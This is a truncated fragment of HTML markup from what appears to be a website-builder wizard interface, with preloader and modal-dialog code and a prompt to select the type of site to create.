id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div> <div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div> <table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z <div id="DIV_DESKTOP" style="width:1%;height:1% <div id="loader" style="height:56px;width <td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPRel <td align="left" valign="middle"><span id="LabelPreloader"> </tr></table></div> <iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0 var sbPreloader = new SbPreloader(); sbPreloader.show(); //--></script><script type="text/javascript"> sb_status = null; </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5 <div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"> <tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr> <td style="width:100%; background-color:white; vertical-align:top;"> <tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header <td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header <td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChan </tr></table></td></tr> <tr><td style="vertical-align:top <tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center"> <tr><td colspan="3" style="padding-bottom <td><img src="/skins/WinXPRel <td class="sb-text" style="padding-left:30px; </tr></table></td></tr> <tr> <td align="center" width="33%" style="padding-right:15px <td><img src="/skins/WinXPRel <td class="sb-text" style="width:100%; background-image: url(/skins/WinXPRelo <td><img src="/skins/WinXPRel </tr></table></td> <td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no() <td><img src="/skins/WinXPRel <td class="sb-text" style="width:100%; background-image: url(/skins/WinXPRelo <td><img src="/skins/WinXPRel </tr></table></td> <td align="center" width="33%" style="padding-left:15px; <td><img src="/skins/WinXPRel <td class="sb-text" style="width:100%; background-image: url(/skins/WinXPRelo <td><img src="/skins/WinXPRel </tr></table></td> </tr> </table></td></tr></table </table></td> <td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span>< </tr></table></td></tr> <tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span>< </table></div> <script type="text/javascript" language="javascript"> SbInitModalForm( </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js sbApplyChangesObject = new SB_ApplyChanges( //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5 <div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"> <tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr> <td style="width:100%; background-color:white; vertical-align:top;"> <tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header <td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header <td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status </tr></table></td></tr> <tr><td style="vertical-align:top <tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div> <div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr> <td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr> <td valign="middle" class="sb-text" style="padding-right: 5px;">View</td> <td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status <option value="1">Information< <option value="2">Errors</option> <option value="3">Warnings< </tr></table></td> <td align="right"><table align="right" onclick="sb_status <td><img src="/skins/WinXPRel <td class="sb-text" style="width:100%; background-image: url(/skins/WinXPRelo <td><img src="/skins/WinXPRel </tr></table></td> </tr></table></div> <div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMe <tr class="sb-gridview-header <th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th> <th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th> <th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th> </tr> <tr class="0" style="display: none;"> <td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..< <td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..< <td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..< </tr> <tr class="1" style="display: none;"> <td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..< <td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..< <td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..< </tr> </table></div> <div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status <td><img src="/skins/WinXPRel <td class="sb-text" style="width:100%; background-image: url(/skins/WinXPRelo <td><img src="/skins/WinXPRel </tr></table></div> </div></td></tr></table>< </table></td> <td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span>< </tr></table></td></tr> <tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span>< </table></div> <script type="text/javascript" language="javascript"> SbInitModalForm( </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0 var baseUrl=''; var sbNavigationObject; sbNavigationObject = new SB_Navigation('SB </script><form name="SB_WizardForm" method="post" enctype="multipart/form <tr id="TRHeader"><td COLSPAN="2"> <table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top <td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPRel <td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px <td align="right" class="sb-header-company </tr></table></td></tr>< <table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"> <td style="padding-left: 10px; width: 100%;" onclick="sb_status <table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline <td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPRel <td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text" </tr></table> <script type="text/javascript" language="javascript" src="/js/Wizard/Status.js sb_status = new SB_Status('/skins </script> </td> <td class="sb-header-bottom <td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPRel <td class="sb-tools-text" style="padding-right:10px </tr></table></a></td>< </tr></table> </td></tr> <tr><td class="sb-wizard-layout <tr><td style="height: 100%; vertical-align: middle;padding: 5px 6px 5px 6px" align="center"><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px <td align="center" style="border-width:0px <tr> <td style="width: 10px; height: 7px; vertical-align: top;"><img src="/skins/WinXPRel <td style="background-repeat: repeat-x; background-position: top right;" background="/skins <td style="width: 10px; vertical-align: top;"><img src="/skins/WinXPRel </tr> <tr> <td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPRel <td height="100%" valign="middle" style="background-repeat: no-repeat; background-position: center left;"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"> <tr><td height="15%"></td></tr> <tr><td height="50%" class="sb-overview-title" align="center" valign="top"><img style="border-width:0px;" src="/skins/WinXPRel <tr><td height="20%" align="center" valign="top"><table cellpadding="0" cellspacing="0" border="0"><tr> <td><div style="width: 0; height: 80px;"><span></span></div <td align="center" valign="top" style="vertical-align: top; padding: 5px;"> <span class="sb-overview-title" <span class="sb-overview-bg sb-text">Select the type of site you would like to create</span> </td> </tr></table></td></tr> <tr><td height="15%"></td></tr> </table></td> <td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPRel </tr> <tr> <td style="vertical-align: bottom;"><img src="/skins/WinXPRel <td style="background-repeat: repeat-x; background-position: bottom right;" background="/skins |